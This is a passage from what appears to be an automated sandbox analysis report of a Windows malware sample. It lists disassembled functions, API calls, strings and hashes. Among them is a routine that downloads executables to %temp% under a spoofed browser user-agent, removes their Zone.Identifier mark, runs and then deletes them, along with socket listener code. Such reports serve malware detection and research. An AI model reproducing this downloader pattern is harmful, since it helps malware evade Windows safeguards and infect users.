                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                              • String ID:
                                              • API String ID: 4174406920-0
                                              • Opcode ID: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                              • Instruction ID: ab17557c7f530dee2ff78f8644a874c55f5dae77ec0fdd8d5eef9b2878869d10
                                              • Opcode Fuzzy Hash: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                              • Instruction Fuzzy Hash: 6031C871A44301AFE320DF649C46F9BB6E0AF48B14F40493DF695EB2E0D3B5D544879A
                                              Function 0040D280 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040D292
                                              • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D2B8
                                              • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D2EF
                                              • GetTickCount.KERNEL32 ref: 0040D304
                                              • Sleep.KERNEL32(00000001), ref: 0040D324
                                              • GetTickCount.KERNEL32 ref: 0040D32A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CountTick$Sleepioctlsocketrecv
                                              • String ID:
                                              • API String ID: 107502007-0
                                              • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                              • Instruction ID: 4b62ca25e6cdc7f9b2e1b521222d8c0dfc3b1f9d22396e6cb4543525420831ef
                                              • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                              • Instruction Fuzzy Hash: 1F31E874D00209EFCB14DFA8D948AEEB7B0FF44315F108669E825A7290D7749A94CB59
                                              Function 0040B010 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • htons.WS2_32(00000050), ref: 0040B03D
                                                • Part of subcall function 0040AFD0: inet_addr.WS2_32(0040B051), ref: 0040AFDA
                                                • Part of subcall function 0040AFD0: gethostbyname.WS2_32(?), ref: 0040AFED
                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0040B05D
                                              • connect.WS2_32(000000FF,?,00000010), ref: 0040B076
                                              • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B0A8
                                              Strings
                                              • www.update.microsoft.com, xrefs: 0040B047
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                              • String ID: www.update.microsoft.com
                                              • API String ID: 4063137541-1705189816
                                              • Opcode ID: 1adbfc87e4e946ee119d9e5b2ddfdf65343185abbb22bc100f48905234863ed2
                                              • Instruction ID: 0ae4650424ba83aa22eef998e17282091954cac8fd9820034268e2ac291e36ad
                                              • Opcode Fuzzy Hash: 1adbfc87e4e946ee119d9e5b2ddfdf65343185abbb22bc100f48905234863ed2
                                              • Instruction Fuzzy Hash: 4A212CB4D102099BDB04DFE4D946BEFBBB4AF08310F104169E515B7390E7745A44CBAA
                                              Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DAED,00000000), ref: 004013D5
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                              • bind.WS2_32(?,?,00000010), ref: 00401429
                                                • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                              • String ID:
                                              • API String ID: 3943618503-0
                                              • Opcode ID: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                              • Instruction ID: d62f3833751a539e27b625c66b0fe154f308ce322b9d6d34e226f7a30690eb36
                                              • Opcode Fuzzy Hash: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                              • Instruction Fuzzy Hash: 5C118974A40710AFE360DF749C0AF877AE0AF04B54F50892DF599E72E1E3F49544879A
                                              Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                              • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                              • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Recv$ErrorLastSleep
                                              • String ID:
                                              • API String ID: 3668019968-0
                                              • Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                              • Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
                                              • Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                              • Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6
                                              Function 0040E040 Relevance: 4.6, APIs: 3, Instructions: 89commemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00405630: lstrlenA.KERNEL32(00000000), ref: 00405647
                                              • SysAllocString.OLEAUT32(00000000), ref: 0040E06E
                                              • CoCreateInstance.OLE32(00412A18,00000000,00004401,00412A08,00000000), ref: 0040E096
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E131
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: String$AllocCreateFreeInstancelstrlen
                                              • String ID:
                                              • API String ID: 2697797874-0
                                              • Opcode ID: 45bdf66638a553dec9b64523f646afcf61dabc29da059ab6423e5f8cb98debcd
                                              • Instruction ID: 223d06f0ec078b81949309064c5540d38f641d7abc0d68c81da219df943d49a2
                                              • Opcode Fuzzy Hash: 45bdf66638a553dec9b64523f646afcf61dabc29da059ab6423e5f8cb98debcd
                                              • Instruction Fuzzy Hash: 37310E75A00208AFDB04DF94CC95FEEB7B5AF88710F1085A8E615AB3E0D775AE91CB44
                                              Function 0040C410 Relevance: 4.5, APIs: 3, Instructions: 26encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptAcquireContextW.ADVAPI32(00407FCF,00000000,00000000,00000001,F0000040,?,?,0040C469,00407FCF,00000004,?,?,0040C49E,000000FF), ref: 0040C423
                                              • CryptGenRandom.ADVAPI32(00407FCF,?,00000000,?,?,0040C469,00407FCF,00000004,?,?,0040C49E,000000FF), ref: 0040C439
                                              • CryptReleaseContext.ADVAPI32(00407FCF,00000000,?,?,0040C469,00407FCF,00000004,?,?,0040C49E,000000FF), ref: 0040C445
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Crypt$Context$AcquireRandomRelease
                                              • String ID:
                                              • API String ID: 1815803762-0
                                              • Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                              • Instruction ID: 6943664ffc8d3a105bd4ceed40135057dfa4a41f6174007770034458561b6d1a
                                              • Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                              • Instruction Fuzzy Hash: 0BE01275650208BBDB24CFD5EC49FDA776CEB48700F104154F70997190DAB5EA4097A9
                                              Function 0040DA30 Relevance: 3.0, APIs: 2, Instructions: 15timenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
                                              • RtlTimeToSecondsSince1980.NTDLL(0040B945,?), ref: 0040DA48
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Time$QuerySecondsSince1980System
                                              • String ID:
                                              • API String ID: 1987401769-0
                                              • Opcode ID: 0613ca7d0cb934da7a106d9058381de88b753c7355ee9c1788c1bc259270ea14
                                              • Instruction ID: 71f66deb3bce6efc95a111259a7627df0bb84068fda71d22670a2dc98323c2b1
                                              • Opcode Fuzzy Hash: 0613ca7d0cb934da7a106d9058381de88b753c7355ee9c1788c1bc259270ea14
                                              • Instruction Fuzzy Hash: 4FD09E79C4010DABCB04DBE4E849CDDB77CEA44201F0086D5AD1592150EAB066588B95
                                              Function 00404090 Relevance: 1.7, Strings: 1, Instructions: 488COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3916222277
                                              • Opcode ID: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                              • Instruction ID: 5fd1260cd0c1bb1f0d43ca887b35fd9fe7aa376b80e30ba4f5f1b1723d8df557
                                              • Opcode Fuzzy Hash: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                              • Instruction Fuzzy Hash: 2C124FF5D00109ABCF14DF98D985AEFB7B5BB98304F10816DE609B7380D739AA41CBA5
                                              Function 0040F669 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtQueryVirtualMemory.NTDLL ref: 0040F71A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryQueryVirtual
                                              • String ID:
                                              • API String ID: 2850889275-0
                                              • Opcode ID: 553652da4901750b097e7af2027d9c2c64a94e5110a95061c8020036af5c5e13
                                              • Instruction ID: c0d74598983d3c40a1cba1c5619970ca770d062c6a6589d1e52c28c523225233
                                              • Opcode Fuzzy Hash: 553652da4901750b097e7af2027d9c2c64a94e5110a95061c8020036af5c5e13
                                              • Instruction Fuzzy Hash: 1361D632A006028BDB39DF29C8806AA73E1EB85354F34C53FD851E7AD0E739DC4AC649
                                              Function 0040A470 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A48C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: HeapsProcess
                                              • String ID:
                                              • API String ID: 1420622215-0
                                              • Opcode ID: 5782e1b582b7a748a5e7f01d040a799827bb7b6b497027464f6411c4e1fb9ee6
                                              • Instruction ID: 6c519ec662c8298c92b433522cbc543683dcf9427bd1d055406e8132846e7857
                                              • Opcode Fuzzy Hash: 5782e1b582b7a748a5e7f01d040a799827bb7b6b497027464f6411c4e1fb9ee6
                                              • Instruction Fuzzy Hash: 6901ECB4904268CADB208F14D988BA9B774BB45304F1081EAD71976281C3B82EDADF5F
                                              Function 0040AA90 Relevance: .4, Instructions: 371COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 273f1a78c8c3246261b393e2372c129719d8c4f288108f15368615b00390e82d
                                              • Instruction ID: 37e1522ff6c285f75b58007950fcecb12f6e209eb0edb739df16a863c33eadfe
                                              • Opcode Fuzzy Hash: 273f1a78c8c3246261b393e2372c129719d8c4f288108f15368615b00390e82d
                                              • Instruction Fuzzy Hash: DB127CB4D002199FCB48CF99D991AAEFBB2FF88304F24856AE415BB345D734AA11CF54
                                              Function 0040F42C Relevance: .1, Instructions: 77COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                              • Instruction ID: d2654b517134af6cf63505f3f822924ca03571e2a680a0b95264841177f41a12
                                              • Opcode Fuzzy Hash: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                              • Instruction Fuzzy Hash: 3321B832900204AFCB20EF69C8C0967B7A5FF45310B458579DD59AB685D734F919C7E0
                                              Function 0040F070 Relevance: 75.5, APIs: 37, Strings: 6, Instructions: 235filesleepnetworkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040F079
                                              • srand.MSVCRT ref: 0040F080
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F0A0
                                              • strlen.NTDLL ref: 0040F0AA
                                              • mbstowcs.NTDLL ref: 0040F0C1
                                              • rand.MSVCRT ref: 0040F0C9
                                              • rand.MSVCRT ref: 0040F0DD
                                              • wsprintfW.USER32 ref: 0040F104
                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F11A
                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F149
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F178
                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F1AB
                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F1DC
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F1EB
                                              • wsprintfW.USER32 ref: 0040F204
                                              • DeleteFileW.KERNEL32(?), ref: 0040F214
                                              • Sleep.KERNEL32(000003E8), ref: 0040F21F
                                              • Sleep.KERNEL32(000007D0), ref: 0040F240
                                              • ExitProcess.KERNEL32 ref: 0040F268
                                              • DeleteFileW.KERNEL32(?), ref: 0040F27E
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F28B
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F298
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F2A5
                                              • Sleep.KERNEL32(000003E8), ref: 0040F2B0
                                              • rand.MSVCRT ref: 0040F2C5
                                              • Sleep.KERNEL32 ref: 0040F2DC
                                              • rand.MSVCRT ref: 0040F2E2
                                              • rand.MSVCRT ref: 0040F2F6
                                              • wsprintfW.USER32 ref: 0040F31D
                                              • DeleteUrlCacheEntryW.WININET(?), ref: 0040F32D
                                              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F347
                                              • wsprintfW.USER32 ref: 0040F367
                                              • DeleteFileW.KERNEL32(?), ref: 0040F377
                                              • Sleep.KERNEL32(000003E8), ref: 0040F382
                                              • Sleep.KERNEL32(000007D0), ref: 0040F3A3
                                              • ExitProcess.KERNEL32 ref: 0040F3CA
                                              • DeleteFileW.KERNEL32(?), ref: 0040F3D9
                                              Strings
                                              • %s:Zone.Identifier, xrefs: 0040F35B
                                              • %s\%d%d.exe, xrefs: 0040F311
                                              • %s\%d%d.exe, xrefs: 0040F0F8
                                              • %temp%, xrefs: 0040F09B
                                              • %s:Zone.Identifier, xrefs: 0040F1F8
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040F115
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                              • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                              • API String ID: 3526668077-2417596247
                                              • Opcode ID: 177b7b3acfa94a5b51c3703646bd270f7b108043caf1cdc0d286447494698f43
                                              • Instruction ID: d1b69f2f4fd2238e53d437ba447cd35dd01203c47a8128eb559f47a2066d0ae0
                                              • Opcode Fuzzy Hash: 177b7b3acfa94a5b51c3703646bd270f7b108043caf1cdc0d286447494698f43
                                              • Instruction Fuzzy Hash: 7691CBB5940318ABE720DB60DC49FE93779AB88701F0484F9F609A51D1DBB99AD4CF28
                                              Function 0040B430 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 506 40b430-40b447 call 40b360 509 40b449 506->509 510 40b44e-40b46a call 40afb0 strcmp 506->510 512 40b6d5-40b6d8 509->512 514 40b471-40b48d call 40afb0 strstr 510->514 515 40b46c 510->515 518 40b4d0-40b4ec call 40afb0 strstr 514->518 519 40b48f-40b4ab call 40afb0 strstr 514->519 515->512 524 40b4ee-40b50a call 40afb0 strstr 518->524 525 40b52f-40b54b call 40afb0 strstr 518->525 526 40b4cb 519->526 527 40b4ad-40b4c9 call 40afb0 strstr 519->527 534 40b52a 524->534 535 40b50c-40b528 call 40afb0 strstr 524->535 536 40b54d-40b569 call 40afb0 strstr 525->536 537 40b58e-40b5a4 EnterCriticalSection 525->537 526->512 527->518 527->526 534->512 535->525 535->534 548 40b589 536->548 549 40b56b-40b587 call 40afb0 strstr 536->549 538 40b5af-40b5b8 537->538 541 40b5e9-40b5f4 call 40b6e0 538->541 542 40b5ba-40b5ca 538->542 555 40b6ca-40b6cf LeaveCriticalSection 541->555 556 40b5fa-40b608 541->556 545 40b5e7 542->545 546 40b5cc-40b5e5 call 40da30 542->546 545->538 546->541 548->512 549->537 549->548 555->512 558 40b60a 556->558 559 40b60e-40b61f call 40a320 556->559 558->559 559->555 562 40b625-40b642 call 40da30 559->562 565 40b644-40b654 562->565 566 40b69a-40b6b2 562->566 567 40b660-40b698 call 40a740 565->567 568 40b656-40b65e Sleep 565->568 569 40b6b8-40b6c3 call 40b6e0 566->569 567->569 568->565 569->555 574 40b6c5 call 40b110 569->574 574->555
                                              APIs
                                                • Part of subcall function 0040B360: gethostname.WS2_32(?,00000100), ref: 0040B37C
                                                • Part of subcall function 0040B360: gethostbyname.WS2_32(?), ref: 0040B38E
                                              • strcmp.NTDLL ref: 0040B460
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: gethostbynamegethostnamestrcmp
                                              • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                              • API String ID: 2906596889-2213908610
                                              • Opcode ID: 5dde0825bd444be26dad4d2e0a68fa3133cd9c23aadc8b3786c6e5e0e51f72e0
                                              • Instruction ID: bd96892130d723efa302dbc8dbf9c53b9c7bf10ac090126f1a0951e43edd4a65
                                              • Opcode Fuzzy Hash: 5dde0825bd444be26dad4d2e0a68fa3133cd9c23aadc8b3786c6e5e0e51f72e0
                                              • Instruction Fuzzy Hash: 0C6181B5A04205A7CB10AF61EC46AAB7774AB10308F14847AF805B73C2E73DE655C6DF
                                              Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
